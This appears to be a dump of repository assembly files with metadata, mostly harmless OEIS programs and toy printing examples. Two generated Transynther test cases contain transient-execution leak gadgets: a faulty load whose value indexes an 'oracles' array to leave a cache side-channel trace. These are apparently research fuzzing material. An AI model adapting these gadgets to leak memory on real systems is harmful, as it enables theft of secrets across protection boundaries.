mov ecx, 90 ; ecx will count down to 0
mov rax, 0 ; rax will hold the current number
mov rbx, 1 ; rbx will hold the next number
print:
;; We need to call printf, but we are using rax, rbx, and rcx. printf may
;; destroy rax and rcx so we will save these before the call and restore
;; them afterwards.
push rax ; caller-save registers
push rcx
lea rdi, [rel format] ; set first parameter (format)
mov rsi, rax ; set second parameter (current_number)
mov rax, 0 ; because printf is varargs
;; Stack is already aligned because we pushed 3 8-byte registers
call [rel printf wrt ..got] ; printf(format, current_number)
pop rcx ; restore caller-save registers
pop rax
mov rdx, rax ; save the current number
mov rax, rbx ; next number is now current
add rbx, rdx ; get the new next number
dec ecx ; count down
jnz print ; if not done counting, do some more
pop rbx ; restore callee-save register
ret
format:
db "%20ld", 10, 0 ; zero-terminated string
| 35.803922
| 79
| 0.513143
|
8d3a4406f81173f5bb021e62a372dad95a92d978
| 4,135
|
asm
|
Assembly
|
Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0xca_notsx.log_22_152.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0xca_notsx.log_22_152.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0xca_notsx.log_22_152.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r15
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_normal_ht+0x5476, %r15
nop
nop
nop
nop
add $61372, %rdx
movl $0x61626364, (%r15)
inc %r12
lea addresses_normal_ht+0xc125, %r15
nop
nop
nop
nop
nop
xor %r10, %r10
mov (%r15), %r11
nop
nop
xor %r10, %r10
lea addresses_WC_ht+0x142a5, %rsi
lea addresses_WC_ht+0x120a5, %rdi
nop
nop
nop
nop
dec %r9
mov $14, %rcx
rep movsl
nop
nop
nop
nop
xor $30178, %r11
lea addresses_WC_ht+0xdd5d, %rsi
lea addresses_normal_ht+0xaea5, %rdi
nop
nop
cmp %rdx, %rdx
mov $16, %rcx
rep movsb
nop
nop
inc %r12
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r15
pop %r12
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r12
push %r8
push %rbx
push %rcx
push %rdx
// Store
lea addresses_PSE+0x7eaf, %rbx
nop
nop
nop
nop
nop
dec %r10
mov $0x5152535455565758, %rdx
movq %rdx, (%rbx)
nop
nop
nop
add %r12, %r12
// Store
lea addresses_RW+0x1b251, %r11
nop
nop
nop
nop
cmp %rcx, %rcx
mov $0x5152535455565758, %r8
movq %r8, %xmm1
vmovups %ymm1, (%r11)
nop
nop
nop
and %r12, %r12
// Store
lea addresses_A+0x13aa5, %r8
nop
nop
nop
nop
cmp $65232, %r10
mov $0x5152535455565758, %rbx
movq %rbx, %xmm4
movntdq %xmm4, (%r8)
add $30899, %r12
// Store
lea addresses_RW+0xc565, %rbx
nop
nop
nop
nop
sub $11447, %r12
mov $0x5152535455565758, %r8
movq %r8, %xmm1
vmovups %ymm1, (%rbx)
// Exception!!!
nop
mov (0), %r8
xor %r11, %r11
// Store
lea addresses_normal+0x1bf4d, %rdx
nop
nop
nop
sub $26693, %rbx
movl $0x51525354, (%rdx)
nop
nop
nop
sub $17230, %rcx
// Store
lea addresses_RW+0x18a25, %r8
nop
nop
nop
xor $40242, %rdx
movl $0x51525354, (%r8)
nop
sub %rdx, %rdx
// Store
lea addresses_WT+0x11aa5, %r8
nop
nop
nop
nop
nop
cmp $45188, %r12
movb $0x51, (%r8)
nop
and $14681, %r11
// Store
mov $0xa5, %rdx
nop
nop
nop
add $36734, %rcx
mov $0x5152535455565758, %r10
movq %r10, %xmm6
vmovups %ymm6, (%rdx)
nop
nop
add $20825, %rcx
// Faulty Load
lea addresses_A+0x13aa5, %r11
nop
sub %r8, %r8
mov (%r11), %ecx
lea oracles, %rdx
and $0xff, %rcx
shlq $12, %rcx
mov (%rdx,%rcx,1), %rcx
pop %rdx
pop %rcx
pop %rbx
pop %r8
pop %r12
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0, 'same': False, 'type': 'addresses_A'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 0, 'same': False, 'type': 'addresses_PSE'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 1, 'same': False, 'type': 'addresses_RW'}, 'OP': 'STOR'}
{'dst': {'NT': True, 'AVXalign': False, 'size': 16, 'congruent': 0, 'same': True, 'type': 'addresses_A'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 2, 'same': False, 'type': 'addresses_RW'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 3, 'same': False, 'type': 'addresses_normal'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 7, 'same': False, 'type': 'addresses_RW'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 11, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 9, 'same': False, 'type': 'addresses_P'}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': True, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_A'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 6, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 11, 'same': False, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 9, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'}
{'src': {'congruent': 3, 'same': False, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 8, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'}
{'51': 22}
51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51
*/
| 18.710407
| 152
| 0.645949
|
1b4e1bf4e6bf8fd7fbafb803846307e09340146e
| 751
|
asm
|
Assembly
|
oeis/230/A230340.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/230/A230340.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/230/A230340.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A230340: Denominator of Sum_{k=1..n} 1/(k(k+1)(k+2)(k+3)) = Sum_{k=1..n} 1/Pochhammer(k,4).
; Submitted by Christian Krause
; 1,24,20,360,315,1008,1512,2160,1485,1320,1716,2184,4095,10080,12240,14688,8721,20520,7980,3080,5313,36432,41400,46800,26325,58968,65772,8120,13485,9920,98208,107712,58905,128520,139860,151848,27417,59280,63960,206640,111069,238392,255420,273240,145935,103776,36848,117600,187425,397800,421668,446472,236115,498960,58520,185136,32509,615960,647820,680760,357399,749952,786240,274560,143715,300696,943092,985320,514395,1073520,1119528,1166832,202575,140600,438900,1369368,711711,1478880,1535760
mov $1,1
lpb $0
mov $2,$0
mul $3,$0
sub $0,1
add $2,3
add $3,$1
mul $1,$2
lpe
mul $1,6
gcd $3,$1
div $1,$3
mov $0,$1
| 41.722222
| 494
| 0.741678
|
1b223fd5d9113780c027381f23196ed2cabf4e3d
| 690
|
asm
|
Assembly
|
Module 1/1. FuckTheWorld/FuckTheWorldStandalone.asm
|
hoangcuongflp/SLAE
|
8687f207748b2d46660a6a03d0a0d0855d7d3b24
|
[
"MIT"
] | 47
|
2017-05-04T09:15:53.000Z
|
2022-02-21T22:19:51.000Z
|
Module 1/1. FuckTheWorld/FuckTheWorldStandalone.asm
|
TaharAmine/SLAE
|
8687f207748b2d46660a6a03d0a0d0855d7d3b24
|
[
"MIT"
] | null | null | null |
Module 1/1. FuckTheWorld/FuckTheWorldStandalone.asm
|
TaharAmine/SLAE
|
8687f207748b2d46660a6a03d0a0d0855d7d3b24
|
[
"MIT"
] | 18
|
2017-05-10T04:32:06.000Z
|
2021-07-27T17:52:09.000Z
|
; FuckTheWorldStandalone.asm
; by Abatchy
;
; nasm -felf32 FuckTheWorldStandalone.asm && ld -o FuckTheWorldStandalone FuckTheWorldStandalone.o && ./FuckTheWorldStandalone
; ---------------------------------------------------------------------------------------
global _start ; Entry point, required for ld linker
section .text ; Text segment, code resides here
_start:
; write(1, message, mlen)
mov eax, 0x4
mov ebx, 0x1
mov ecx, message
mov edx, mlen
int 0x80
; exit(5)
mov eax, 0x1
mov ebx, 0x5
int 0x80
section .data ; Data segment
message: db "Fuck the world. And you.", 10
mlen equ $-message
| 24.642857
| 126
| 0.555072
|
835bb55a0c491c6abe6903c9dd4c63f86166bdc2
| 341
|
asm
|
Assembly
|
programs/oeis/040/A040059.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/040/A040059.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/040/A040059.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A040059: Continued fraction for sqrt(68).
; 8,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4,16,4
sub $0,1
mod $0,2
sub $0,1
gcd $0,4
mul $0,4
| 37.888889
| 250
| 0.607038
|
fa61a7917f174c227fb68512a44d03d0e2105ac0
| 2,651
|
asm
|
Assembly
|
programs/oeis/006/A006414.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/006/A006414.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/006/A006414.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A006414: Number of nonseparable toroidal tree-rooted maps on n nodes.
; 1,9,40,125,315,686,1344,2430,4125,6655,10296,15379,22295,31500,43520,58956,78489,102885,133000,169785,214291,267674,331200,406250,494325,597051,716184,853615,1011375,1191640,1396736,1629144,1891505,2186625,2517480,2887221,3299179,3756870,4264000,4824470,5442381,6122039,6867960,7684875,8577735,9551716,10612224,11764900,13015625,14370525,15835976,17418609,19125315,20963250,22939840,25062786,27340069,29779955,32391000,35182055,38162271,41341104,44728320,48334000,52168545,56242681,60567464,65154285,70014875,75161310,80606016,86361774,92441725,98859375,105628600,112763651,120279159,128190140,136512000,145260540,154451961,164102869,174230280,184851625,195984755,207647946,219859904,232639770,246007125,259981995,274584856,289836639,305758735,322373000,339701760,357767816,376594449,396205425,416625000,437877925,459989451,482985334,506891840,531735750,557544365,584345511,612167544,641039355,670990375,702050580,734250496,767621204,802194345,838002125,875077320,913453281,953163939,994243810,1036728000,1080652210,1126052741,1172966499,1221431000,1271484375,1323165375,1376513376,1431568384,1488371040,1546962625,1607385065,1669680936,1733893469,1800066555,1868244750,1938473280,2010798046,2085265629,2161923295,2240819000,2322001395,2405519831,2491424364,2579765760,2670595500,2763965785,2859929541,2958540424,3059852825,3163921875,3270803450,3380554176,3493231434,3608893365,3727598875,3849407640,3974380111,4102577519,4234061880,4368896000,4507143480,4648868721,4794136929,4943014120,5095567125,5251863595,5411972006,5575961664,5743902710,5915866125,6091923735,6272148216,6456613099,6645392775,6838562500,7036198400,7238377476,7445177609,7656677565,7872957000,8094096465,8320177411,8551282194,8787494080,9028897250,9275576805,9527618771,9785110104,10048138695,10316793375,10591163920,10871341056,11157416464,11449482785,11747633625,12051963560,12362568141,12679543899,13002988350,13333000000,13669678350,14013123901,14363438159,14720723640,15085083875,15456623415,15835447836,16221663744,16615378780,17016701625,17425742005,17842610696,18267419529,18700281395,19141310250,19590621120,20048330106,20514554389,20989412235,21473023000,21965507135,22466986191,22977582824,23497420800,24026625000,24565321425,25113637201,25671700584,26239640965,26817588875,27405675990,28004035136,28612800294,29232106605,29862090375,30502889080,31154641371,31817487079,32491567220,33177024000,33874000820,34582642281,35303094189,36035503560,36780018625,37536788835,38305964866,39087698624,39882143250,40689453125,41509783875
add $0,2
mov $2,$0
pow $0,2
bin $0,2
mul $0,$2
mov $1,$0
div $1,12
| 241
| 2,510
| 0.887212
|
f308518d439796fbe06792e95398955e855840b2
| 385
|
asm
|
Assembly
|
programs/oeis/120/A120137.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/120/A120137.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/120/A120137.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A120137: a(1)=8; a(n)=floor((17+sum(a(1) to a(n-1)))/2).
; 8,12,18,27,41,61,92,138,207,310,465,698,1047,1570,2355,3533,5299,7949,11923,17885,26827,40241,60361,90542,135813,203719,305579,458368,687552,1031328,1546992,2320488,3480732,5221098,7831647,11747471,17621206
mov $1,2
mov $2,3
lpb $0
sub $0,1
add $2,$1
mov $1,8
add $1,$2
div $1,2
add $2,6
lpe
add $1,6
mov $0,$1
| 24.0625
| 208
| 0.667532
|
42c9d4cb58af9736ba3a4ce735637c76fe75feb4
| 268
|
asm
|
Assembly
|
Windows/ass.asm
|
Gabriel-Lima232/Assembly
|
6c7168f83844658431033de395c7cc0079f32e54
|
[
"MIT"
] | null | null | null |
Windows/ass.asm
|
Gabriel-Lima232/Assembly
|
6c7168f83844658431033de395c7cc0079f32e54
|
[
"MIT"
] | null | null | null |
Windows/ass.asm
|
Gabriel-Lima232/Assembly
|
6c7168f83844658431033de395c7cc0079f32e54
|
[
"MIT"
] | null | null | null |
global _main
section .text
_main:
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
MOV EAX, 41424344h
MOV BX, 4141h
MOV CH, 41h
MOV DL, 41h
XOR EAX, EAX
XOR EBX, EBX
XOR ECX, ECX
XOR EDX, EDX
| 12.761905
| 23
| 0.488806
|
aac888f575a2d0c514f6b3f230aa69be25ceda5e
| 2,117
|
asm
|
Assembly
|
Microprocessor/print.asm
|
Nmane1612/Nihar-Mane
|
aa4db52a384f706a431c994e4e12d8e5e0cd8402
|
[
"Apache-2.0"
] | 3
|
2019-12-27T06:07:37.000Z
|
2020-07-01T08:51:32.000Z
|
Microprocessor/print.asm
|
Nihar16/Personal-Repository
|
0d319eeb8dbfa3f7c3eb8501829939ecd6923464
|
[
"MIT"
] | null | null | null |
Microprocessor/print.asm
|
Nihar16/Personal-Repository
|
0d319eeb8dbfa3f7c3eb8501829939ecd6923464
|
[
"MIT"
] | null | null | null |
; this example shows how to print string.
; the string is defined just after the call instruction.
; this example does not use emu8086.inc library.
name "print"
org 100h
; set these values to registers for no particular reason,
; we just want to check that the procedure does not destroy them.
mov si, 1234h
mov ax, 9876h
; 0Dh,0Ah - is the code
; for standard new
; line characters:
; 0Dh - carriage return.
; 0Ah - new line.
call printme
db 'hello', 0
; gets here after print:
mov cx, 1
call printme
db ' world!', 0Dh,0Ah, 0
; gets here after print:
mov cx, 2
call printme
db 'hi there!', 0Ah
db "what's up?", 0Dh,0Ah
db 'printing!', 0
; printme returns here:
xor cx, cx
call printme
db 0xd,0xa,"press any key...", 0
; wat for any key....
mov ah, 0
int 16h
ret ; return to os.
;*******************************
; this procedure prints a null terminated
; string at current cursor position.
; the zero terminated string should
; be defined just after
; the call. for example:
;
; call printme
; db 'hello world!', 0
;
; address of string is stored in the
; stack as return address.
; procedure updates value in the
; stack to make return
; after string definition.
printme:
mov cs:temp1, si ; protect si register.
pop si ; get return address (ip).
push ax ; store ax register.
next_char:
mov al, cs:[si]
inc si ; next byte.
cmp al, 0
jz printed
mov ah, 0eh ; teletype function.
int 10h
jmp next_char ; loop.
printed:
pop ax ; re-store ax register.
; si should point to next command after
; the call instruction and string definition:
push si ; save new return address into the stack.
mov si, cs:temp1 ; re-store si register.
ret
; variable to store original
; value of si register.
temp1 dw ?
;*******************************
| 21.602041
| 66
| 0.567312
|
a5b9789b736826e1a694de67431692e82caa91aa
| 5,922
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_21829_1673.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_21829_1673.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_21829_1673.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0xe378, %rsi
lea addresses_A_ht+0xb428, %rdi
nop
nop
nop
nop
sub $29370, %rbx
mov $20, %rcx
rep movsw
nop
nop
nop
nop
dec %rbp
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r15
push %r9
push %rax
push %rcx
push %rdi
push %rsi
// REPMOV
lea addresses_WC+0x14d98, %rsi
lea addresses_normal+0xb298, %rdi
nop
sub %r14, %r14
mov $9, %rcx
rep movsb
nop
nop
nop
nop
dec %rsi
// Store
lea addresses_normal+0x3380, %r14
dec %rax
movw $0x5152, (%r14)
nop
nop
nop
nop
nop
inc %r14
// Store
lea addresses_WC+0x1ae98, %rdi
nop
nop
nop
nop
sub %r9, %r9
movw $0x5152, (%rdi)
nop
nop
dec %rdi
// Store
lea addresses_WC+0x1dade, %rsi
nop
nop
sub %r13, %r13
movb $0x51, (%rsi)
nop
nop
nop
inc %r9
// REPMOV
lea addresses_WC+0x6598, %rsi
lea addresses_WC+0x10698, %rdi
nop
nop
nop
and %r15, %r15
mov $126, %rcx
rep movsq
sub %r13, %r13
// Store
lea addresses_WT+0x1c198, %r13
nop
nop
nop
nop
nop
and %r9, %r9
mov $0x5152535455565758, %r15
movq %r15, (%r13)
sub %rsi, %rsi
// Store
lea addresses_A+0x6698, %r9
nop
nop
nop
nop
cmp %r15, %r15
mov $0x5152535455565758, %rdi
movq %rdi, %xmm2
vmovups %ymm2, (%r9)
nop
nop
nop
nop
nop
dec %rcx
// Faulty Load
lea addresses_WC+0x10698, %r15
nop
nop
nop
cmp %r9, %r9
mov (%r15), %si
lea oracles, %rdi
and $0xff, %rsi
shlq $12, %rsi
mov (%rdi,%rsi,1), %rsi
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r15
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_WC', 'size': 8, 'AVXalign': True, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_normal', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 1, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_WC', 'congruent': 0, 'same': True}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_WC', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 1, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 4, 'same': False}}
{'38': 21829}
38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38
*/
| 35.674699
| 2,999
| 0.656028
|
de80f5f23231e013fc01553af38ca0be2504d6ea
| 515
|
asm
|
Assembly
|
ntplay-vars.asm
|
lavacablasa/ninja-tracker-kickass
|
de19bd82ccff64340b959371ba376128a8499691
|
[
"Unlicense",
"MIT"
] | null | null | null |
ntplay-vars.asm
|
lavacablasa/ninja-tracker-kickass
|
de19bd82ccff64340b959371ba376128a8499691
|
[
"Unlicense",
"MIT"
] | null | null | null |
ntplay-vars.asm
|
lavacablasa/ninja-tracker-kickass
|
de19bd82ccff64340b959371ba376128a8499691
|
[
"Unlicense",
"MIT"
] | null | null | null |
//-------------------------------------------------------------------------------
// NinjaTracker V2.04 gamemusic playroutine - Variables
//
// Cadaver 6/2013
//-------------------------------------------------------------------------------
//-------------------------------------------------------------------------------
// Zeropage work area. 2 consecutive addresses are needed.
//-------------------------------------------------------------------------------
nt_temp1: .byte 0
nt_temp2: .byte 0
| 42.916667
| 81
| 0.250485
|
5a8abd8c03d91d1d23e51384d7b99fe280601e19
| 808
|
asm
|
Assembly
|
oeis/142/A142344.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/142/A142344.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/142/A142344.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A142344: Primes congruent to 25 mod 46.
; Submitted by Jon Maiga
; 71,163,347,439,577,761,853,991,1129,1451,1543,2003,2141,2371,2417,2647,2693,2969,3061,3613,3659,3797,3889,4027,4073,4211,4349,4441,4993,5039,5407,5591,5683,5821,5867,6143,6373,6833,6971,7109,7247,7477,7523,7753,7937,8167,8443,8581,8627,8719,9041,9133,9547,10007,10099,10513,10559,10651,10789,10973,11617,11801,11939,12491,12583,12721,13043,13411,13457,13687,13963,14009,14423,14561,14653,14699,14929,15527,15619,15803,16033,16217,16447,16493,16631,17137,17183,17321,17551,17597,17827,18149,18287
mov $2,$0
add $2,6
pow $2,2
lpb $2
mov $3,$4
add $3,24
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
mov $1,$0
max $1,0
cmp $1,$0
mul $2,$1
sub $2,1
add $4,46
lpe
mov $0,$4
add $0,25
| 36.727273
| 497
| 0.727723
|
e92ce2da5203bcf05f96c634050b20bdd98828d8
| 666
|
asm
|
Assembly
|
oeis/035/A035038.asm
|
neoneye/loda-programs
|
